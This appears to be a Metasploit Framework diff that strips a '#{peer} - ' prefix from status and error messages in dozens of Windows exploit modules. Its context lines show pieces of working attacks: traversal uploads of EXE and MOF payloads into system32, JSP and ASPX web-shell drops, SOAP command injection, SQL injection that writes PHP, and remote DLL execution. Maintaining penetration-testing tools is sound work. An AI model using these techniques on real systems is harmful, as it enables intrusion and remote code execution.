send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'jsp', 'Login.do'), @@ -109,14 +109,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 redirect = URI(res.headers['Location']).to_s.gsub(/#\//, "") - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => redirect, 'method' => 'GET' @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.body =~ /window.OPM.apiKey = "([a-z0-9]+)"/ api_key = $1 - print_status("#{peer} - Retrieved API key [ #{api_key} ]") + print_status("Retrieved API key [ #{api_key} ]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed!") end @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote war_payload = payload.encoded_war({ :app_name => app_base }).to_s war_payload_base64 = Rex::Text.encode_base64(war_payload).gsub(/\n/, '') - print_status("#{peer} - Executing SQL queries") + print_status("Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' @@ -167,7 +167,7 @@ class Metasploit3 < Msf::Exploit::Remote select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war - print_status("#{peer} - Attempting to launch payload in deployed WAR...") + print_status("Attempting to launch payload in deployed WAR...") res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, "#{Rex::Text.rand_text_alpha(rand(8) + 8)}.jsp"), diff --git a/modules/exploits/windows/http/miniweb_upload_wbem.rb b/modules/exploits/windows/http/miniweb_upload_wbem.rb index 23aa9083fa..9fe3d101c1 100644 --- a/modules/exploits/windows/http/miniweb_upload_wbem.rb +++ b/modules/exploits/windows/http/miniweb_upload_wbem.rb @@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote def upload(filename, filedata) - print_status("#{peer} - Trying to upload '#{::File.basename(filename)}'") + print_status("Trying to upload '#{::File.basename(filename)}'") uri = normalize_uri(target_uri.path.to_s, "#{rand_text_alpha(rand(10)+5)}") depth = "../" * (datastore['DEPTH'] + rand(10)) @@ -118,13 +118,13 @@ class Metasploit3 < Msf::Exploit::Remote # upload exe exe_name = "WINDOWS/system32/#{fname}.exe" exe = generate_payload_exe - print_status("#{peer} - Sending executable (#{exe.length.to_s} bytes)") + print_status("Sending executable (#{exe.length.to_s} bytes)") upload(exe_name, exe) # upload mof mof_name = "WINDOWS/system32/wbem/mof/#{fname}.mof" mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name)) - print_status("#{peer} - Sending MOF (#{mof.length.to_s} bytes)") + print_status("Sending MOF (#{mof.length.to_s} bytes)") upload(mof_name, mof) # list files to clean up diff --git a/modules/exploits/windows/http/novell_mdm_lfi.rb b/modules/exploits/windows/http/novell_mdm_lfi.rb index af793df59f..b70727e917 100644 --- a/modules/exploits/windows/http/novell_mdm_lfi.rb +++ b/modules/exploits/windows/http/novell_mdm_lfi.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote def check v = get_version - print_status("#{peer} - Detected version: #{v || 'Unknown'}") + print_status("Detected version: #{v || 'Unknown'}") if v.nil? return Exploit::CheckCode::Unknown @@ -133,19 +133,19 @@ class Metasploit3 < Msf::Exploit::Remote def exploit() begin - print_status("#{peer} - Checking application version...") + print_status("Checking application version...") v = get_version if v.nil? - print_error("#{peer} - Unable to detect version, abort!") + print_error("Unable to detect version, abort!") return end - print_good("#{peer} - Found Version #{v}") - print_status("#{peer} - Setting up poisoned session") + print_good("Found Version #{v}") + print_status("Setting up poisoned session") session_id,cmd = setup_session() - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") fname = upload_shell(session_id,cmd) - print_status("#{peer} - Executing payload") + print_status("Executing payload") exec_shell(session_id,cmd,fname) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index c9abd7bfad..7980ec25ae 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote end traversal << "WINDOWS\\system32\\#{@var_vbs_name}.vbs" - print_status("#{peer} - Uploading the VBS payload") + print_status("Uploading the VBS payload") soap_request = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" " soap_request << "xmlns:int=\"http://schemas.amberpoint.com/flashtunnel/interfaces\" " @@ -163,9 +163,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - VBS payload successfully uploaded") + print_status("VBS payload successfully uploaded") else - print_error("#{peer} - Failed to upload the VBS payload") + print_error("Failed to upload the VBS payload") return end @@ -191,7 +191,7 @@ class Metasploit3 < Msf::Exploit::Remote soap_request << " </soapenv:Body>" soap_request << "</soapenv:Envelope>" - print_status("#{peer} - Uploading the MOF file") + print_status("Uploading the MOF file") res = send_request_cgi( { @@ -204,9 +204,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - MOF file successfully uploaded") + print_status("MOF file successfully uploaded") else - print_error("#{peer} - Failed to upload the MOF file") + print_error("Failed to upload the MOF file") return end @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote end traversal << "\\server\\examples\\build\\mainWebApp\\#{@jsp_name}.jsp" - print_status("#{peer} - Uploading the JSP payload") + print_status("Uploading the JSP payload") soap_request = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" " soap_request << "xmlns:int=\"http://schemas.amberpoint.com/flashtunnel/interfaces\" " @@ -249,13 +249,13 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - JSP payload successfully uploaded") + print_status("JSP payload successfully uploaded") else - print_error("#{peer} - Failed to upload the JSP payload") + print_error("Failed to upload the JSP payload") return end - print_status("#{peer} - Executing the uploaded JSP #{@jsp_name}.jsp ...") + print_status("Executing the uploaded JSP #{@jsp_name}.jsp ...") res = send_request_cgi( { 'uri' => "/#{@jsp_name}.jsp", diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb index fd94612b71..3e8ce2702c 100644 --- a/modules/exploits/windows/http/oracle_endeca_exec.rb +++ b/modules/exploits/windows/http/oracle_endeca_exec.rb @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote version = version_match[1] end - vprint_status("#{peer} - Version found: Oracle Endeca Server #{version}") + vprint_status("Version found: Oracle Endeca Server #{version}") if version =~ /7\.4\.0/ and version <= "7.4.0.787" return Exploit::CheckCode::Appears @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote # Windows 2008 Command Prompt Max Length is 8191 fail_with(Failure::BadConfig, "#{peer} - The selected payload is too long to execute through powershell in one command") end - print_status("#{peer} - Exploiting through Powershell...") + print_status("Exploiting through Powershell...") execute_command(command) end diff --git a/modules/exploits/windows/http/oracle_event_processing_upload.rb b/modules/exploits/windows/http/oracle_event_processing_upload.rb index 3a580df1fb..853c55c046 100644 --- a/modules/exploits/windows/http/oracle_event_processing_upload.rb +++ b/modules/exploits/windows/http/oracle_event_processing_upload.rb @@ -86,22 +86,22 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Generating payload and mof file...") + print_status("Generating payload and mof file...") mof_name = "#{rand_text_alpha(rand(5)+5)}.mof" exe_name = "#{rand_text_alpha(rand(5)+5)}.exe" exe_content = generate_payload_exe mof_content = generate_mof(mof_name, exe_name) - print_status("#{peer} - Uploading the exe payload #{exe_name}...") + print_status("Uploading the exe payload #{exe_name}...") exe_traversal = "#{traversal}WINDOWS/system32/#{exe_name}" res = upload(exe_traversal, exe_content) unless res && res.code == 200 && res.body.blank? - print_error("#{peer} - Unexpected answer, trying anyway...") + print_error("Unexpected answer, trying anyway...") end register_file_for_cleanup(exe_name) - print_status("#{peer} - Uploading the MOF file #{mof_name}") + print_status("Uploading the MOF file #{mof_name}") mof_traversal = "#{traversal}WINDOWS/system32/wbem/mof/#{mof_name}" upload(mof_traversal, mof_content) register_file_for_cleanup("wbem/mof/good/#{mof_name}") diff --git a/modules/exploits/windows/http/rejetto_hfs_exec.rb b/modules/exploits/windows/http/rejetto_hfs_exec.rb index 7c24bcaf8f..41cbf1fae9 100644 --- a/modules/exploits/windows/http/rejetto_hfs_exec.rb +++ b/modules/exploits/windows/http/rejetto_hfs_exec.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, req) - print_status("#{peer} - Payload request received: #{req.uri}") + print_status("Payload request received: #{req.uri}") exe = generate_payload_exe vbs = Msf::Util::EXE.to_exe_vbs(exe) send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) diff --git a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb index ee531318fd..06dc9a7abb 100644 --- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb +++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb @@ -381,7 +381,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Testing command injection...") + print_status("Testing command injection...") res = send_request_cgi({ 'uri' => '/', @@ -453,7 +453,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Injecting system commands...") + print_status("Injecting system commands...") res = send_request_cgi({ 'uri' => '/', @@ -466,9 +466,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 10) if (res and res.code == 500 and res.body =~ /Generic error/) - print_good("#{peer} - System command successfully injected") + print_good("System command successfully injected") else - print_error("#{peer} - Failed to inject system command") + print_error("Failed to inject system command") return end @@ -505,7 +505,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Executing injected command") + print_status("Executing injected command") res = send_request_cgi({ 'uri' => '/', @@ -518,7 +518,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 1) if res - print_error("#{peer} - Failed to execute injected command") + print_error("Failed to execute injected command") return end diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb index a61073ba6b..bf935718d0 100644 --- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb +++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb @@ -63,7 +63,7 @@ class Metasploit4 < Msf::Exploit::Remote meterp = Rex::Text.rand_text_alpha(10) jsp = Rex::Text.rand_text_alpha(10) - print_status("#{peer} - Getting cookie...") + print_status("Getting cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), @@ -89,7 +89,7 @@ class Metasploit4 < Msf::Exploit::Remote <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %> } - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', @@ -110,7 +110,7 @@ class Metasploit4 < Msf::Exploit::Remote register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe") - print_status("#{peer} - Uploading JSP page to execute the payload...") + print_status("Uploading JSP page to execute the payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', @@ -131,7 +131,7 @@ class Metasploit4 < Msf::Exploit::Remote register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp") - print_status("#{peer} - Executing payload. Manual cleanup will be required.") + print_status("Executing payload. Manual cleanup will be required.") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp") }, 5) diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index 5bd2bfab84..4638454fcb 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote php_fname = Rex::Text.rand_text_alpha(5) + ".php" rnd_txt = Rex::Text.rand_text_alpha_upper(3) - print_status("#{peer} - Sending SQL injection...") + print_status("Sending SQL injection...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => 'POST', @@ -88,10 +88,10 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.body !~ /No Results Found/ - print_error("#{peer} - I don't think the SQL Injection attempt worked") + print_error("I don't think the SQL Injection attempt worked") return elsif not res - print_error("#{peer} - No response from the server") + print_error("No response from the server") return end @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status(res.to_s) target_path = "#{File.dirname(target_uri.path)}/#{php_fname}" - print_status("#{peer} - Requesting: #{target_path}") + print_status("Requesting: #{target_path}") send_request_raw({'uri' => normalize_uri(target_path)}) handler diff --git a/modules/exploits/windows/http/trackit_file_upload.rb b/modules/exploits/windows/http/trackit_file_upload.rb index da07199b52..1d33984b1e 100644 --- a/modules/exploits/windows/http/trackit_file_upload.rb +++ b/modules/exploits/windows/http/trackit_file_upload.rb @@ -499,7 +499,7 @@ class Metasploit3 < Msf::Exploit::Remote # sleep a few seconds, sometimes the service takes a while to write to disk sleep(datastore['SLEEP']) - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename), 'method' => 'GET' @@ -507,7 +507,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 500 - print_error("#{peer} - Got HTTP 500, trying again with " + (@version == 9 ? "ASPX" : "ASPX")) + print_error("Got HTTP 500, trying again with " + (@version == 9 ? "ASPX" : "ASPX")) # try again but now use ASPX instead of ASP or vice-versa if @version == 9 file_content = Msf::Util::EXE.to_exe_aspx(exe) @@ -521,7 +521,7 @@ class Metasploit3 < Msf::Exploit::Remote # sleep a few seconds, sometimes the service takes a while to write to disk sleep(datastore['SLEEP']) - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename), 'method' => 'GET' diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index 490f35f88d..683baf2a5c 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote begin aspx = @upload_random + '.aspx' - print_status("#{peer} - Searching: #{aspx}") + print_status("Searching: #{aspx}") files = cli.fs.file.search("\\", aspx) if not files or files.empty? print_error("Unable to find #{aspx}. Please manually remove it.") @@ -79,10 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote end files.each { |f| - print_warning("#{peer} - Deleting: #{f['path'] + "\\" + f['name']}") + print_warning("Deleting: #{f['path'] + "\\" + f['name']}") cli.fs.file.rm(f['path'] + "\\" + f['name']) } - print_good("#{peer} - #{aspx} deleted") + print_good("#{aspx} deleted") rescue ::Exception => e print_error("Unable to delete #{aspx}: #{e.message}") end @@ -121,8 +121,8 @@ class Metasploit3 < Msf::Exploit::Remote # attack_url = uri_path + "webservices/codeEditorSave.asmx" - print_status("#{peer} - Uploading #{aspx.length} bytes through #{attack_url}...") - print_status("#{peer} - Uploading to #{uri_path}#{@upload_random}.aspx") + print_status("Uploading #{aspx.length} bytes through #{attack_url}...") + print_status("Uploading to #{uri_path}#{@upload_random}.aspx") res = send_request_cgi({ 'uri' => attack_url, @@ -135,11 +135,11 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_status("#{peer} - Timeout: Trying to execute the payload anyway") + print_status("Timeout: Trying to execute the payload anyway") elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/) - print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") + print_status("Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") else - print_status("#{peer} - Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway") + print_status("Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway") end # @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote # upload_path = uri_path + "#{@upload_random}.aspx" - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_cgi({ 'uri' => upload_path, @@ -155,12 +155,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Execution failed on #{upload_path} [No Response]") + print_error("Execution failed on #{upload_path} [No Response]") return end if (res.code < 200 or res.code > 302) - print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]") + print_error("Execution failed on #{upload_path} [#{res.code} #{res.message}]") return end @@ -183,8 +183,8 @@ class Metasploit3 < Msf::Exploit::Remote eos attack_url = uri_path + "webservices/codeEditorSave.asmx" - print_status("#{peer} - Writing #{aspx.length} bytes through #{attack_url}...") - print_status("#{peer} - Wrting over #{uri_path}#{@upload_random}.aspx") + print_status("Writing #{aspx.length} bytes through #{attack_url}...") + print_status("Wrting over #{uri_path}#{@upload_random}.aspx") res = send_request_cgi({ 'uri' => attack_url, @@ -197,12 +197,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Deletion failed at #{attack_url} [No Response]") + print_error("Deletion failed at #{attack_url} [No Response]") return elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/) - print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") + print_status("Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") else - print_status("#{peer} - Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]") + print_status("Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]") end handler end diff --git a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb index 2466bffdee..0a8a6421b9 100644 --- a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb +++ b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb @@ -67,17 +67,17 @@ class Metasploit3 < Msf::Exploit::Remote end if cli.type != 'meterpreter' - print_error("#{peer} - Meterpreter not used. Please manually remove #{@dropper}") + print_error("Meterpreter not used. Please manually remove #{@dropper}") return end cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin - print_status("#{peer} - Searching: #{@dropper}") + print_status("Searching: #{@dropper}") files = cli.fs.file.search("\\", @dropper) if not files or files.empty? - print_error("#{peer} - Unable to find #{@dropper}. Please manually remove it.") + print_error("Unable to find #{@dropper}. Please manually remove it.") return end @@ -85,10 +85,10 @@ class Metasploit3 < Msf::Exploit::Remote print_warning("Deleting: #{f['path'] + "\\" + f['name']}") cli.fs.file.rm(f['path'] + "\\" + f['name']) } - print_good("#{peer} - #{@dropper} deleted") + print_good("#{@dropper} deleted") return rescue ::Exception => e - print_error("#{peer} - Unable to delete #{@dropper}: #{e.message}") + print_error("Unable to delete #{@dropper}: #{e.message}") end end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha(8) + ".exe" @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri("cbmui", "images", dropper_filename), diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index c064c4be86..e20af52a2a 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -96,26 +96,26 @@ class Metasploit3 < Msf::Exploit::Remote mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") + print_status("Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ - print_good("#{peer} - #{exe_name} uploaded successfully") + print_good("#{exe_name} uploaded successfully") else if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ - print_error("#{peer} - Upload failed, check the DEPTH option") + print_error("Upload failed, check the DEPTH option") end fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{exe_name}") end - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") + print_status("Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ - print_good("#{peer} - #{mof_name} uploaded successfully") + print_good("#{mof_name} uploaded successfully") register_file_for_cleanup(exe_name) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") else if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ - print_error("#{peer} - Upload failed, check the DEPTH option") + print_error("Upload failed, check the DEPTH option") end fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{mof_name}") end diff --git a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb index b8fc3c811f..3626d62b2c 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote self.file_contents = generate_payload_dll print_status("File available on #{unc}...") - print_status("#{peer} - Trying to execute remote DLL...") + print_status("Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end diff --git a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb index cfa69e5d2f..5c85510fb9 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.06\.(\d+)/ minor = $1.to_i @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote # Windows 2008 Command Prompt Max Length is 8191 fail_with(Failure::BadConfig, "#{peer} - The selected payload is too long to execute through powershell in one command") end - print_status("#{peer} - Exploiting through Powershell...") + print_status("Exploiting through Powershell...") exec_bar(datastore['CMDPATH'], command, "\x00") end end diff --git a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb index b43d9af842..a61d414c6c 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.06\.(\d+)/ minor = $1.to_i @@ -92,11 +92,11 @@ class Metasploit3 < Msf::Exploit::Remote mof = generate_mof(mof_name, vbs_name) # We can't upload binary contents, so embedding the exe into a VBS. - print_status("#{peer} - Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...") + print_status("Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...") upload_file("windows\\system32\\#{vbs_name}", vbs) register_file_for_cleanup(vbs_name) - print_status("#{peer} - Sending malicious packet with opcode 42 to upload the mof file #{mof_name}") + print_status("Sending malicious packet with opcode 42 to upload the mof file #{mof_name}") upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") end diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 25e196293b..67a59e7911 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -134,10 +134,10 @@ user-agent: BBC 11.00.044; coda unknown version peer = "#{rhost}:#{rport}" - print_status "#{peer} - Ping host..." + print_status "Ping host..." res = ping if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/ - print_error("#{peer} - Host didn't answer correctly to ping") + print_error("Host didn't answer correctly to ping") return end @@ -157,11 +157,11 @@ user-agent: BBC 11.00.044; 14 eos - print_status("#{peer} - Sending HTTP Expect...") + print_status("Sending HTTP Expect...") sock.put(http_headers) res = sock.get_once if not res or res !~ /HTTP\/1\.1 100 Continue/ - print_error("#{peer} - Failed while sending HTTP Expect Header") + print_error("Failed while sending HTTP Expect Header") return end @@ -197,7 +197,7 @@ user-agent: BBC 11.00.044; 14 http_body << coda_request http_body << "\x0d\x0a\x0d\x0a" - print_status("#{peer} - Triggering overflow...") + print_status("Triggering overflow...") sock.put(http_body) disconnect diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index f38eeb33a9..d9e85a05f9 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -136,10 +136,10 @@ user-agent: BBC 11.00.044; coda unknown version peer = "#{rhost}:#{rport}" - print_status "#{peer} - Ping host..." + print_status "Ping host..." res = ping if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/ - print_error("#{peer} - Host didn't answer correctly to ping") + print_error("Host didn't answer correctly to ping") return end @@ -159,11 +159,11 @@ user-agent: BBC 11.00.044; 14 eos - print_status("#{peer} - Sending HTTP Expect...") + print_status("Sending HTTP Expect...") sock.put(http_headers) res = sock.get_once if not res or res !~ /HTTP\/1\.1 100 Continue/ - print_error("#{peer} - Failed while sending HTTP Expect Header") + print_error("Failed while sending HTTP Expect Header") return end @@ -199,7 +199,7 @@ user-agent: BBC 11.00.044; 14 http_body << coda_request http_body << "\x0d\x0a\x0d\x0a" - print_status("#{peer} - Triggering overflow...") + print_status("Triggering overflow...") sock.put(http_body) disconnect diff --git a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb index b9be472306..b8b84e1f1c 100644 --- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb +++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb @@ -246,7 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote def check peer = "#{rhost}:#{rport}" - print_status("#{peer} - Checking if CIMListener exists...") + print_status("Checking if CIMListener exists...") res = send_request_cgi({ 'uri' => "/CIMListener/", @@ -286,7 +286,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("Payload available at #{exploit_unc}#{share_name}\\#{basename}.dll") - print_status("#{peer} - Injecting DLL...") + print_status("Injecting DLL...") res = send_request_cgi({ 'uri' => "/CIMListener/#{exploit_unc}#{share_name}\\#{basename}.dll", @@ -302,7 +302,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /CIMVERSION/ - print_status"#{peer} - Then injection seemed to work..." + print_status"Then injection seemed to work..." else fail_with(Failure::Unknown, "#{peer} - Unexpected response") end diff --git a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb index ad3de555e3..1d451f3d3d 100644 --- a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb +++ b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect ManageEngine EventLog Analyzer") + vprint_status("Trying to detect ManageEngine EventLog Analyzer") res = send_request_cgi({ 'method' => 'GET', @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Retrieving JSESSION ID") + print_status("Retrieving JSESSION ID") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'event', 'index3.do'), @@ -122,12 +122,12 @@ class Metasploit3 < 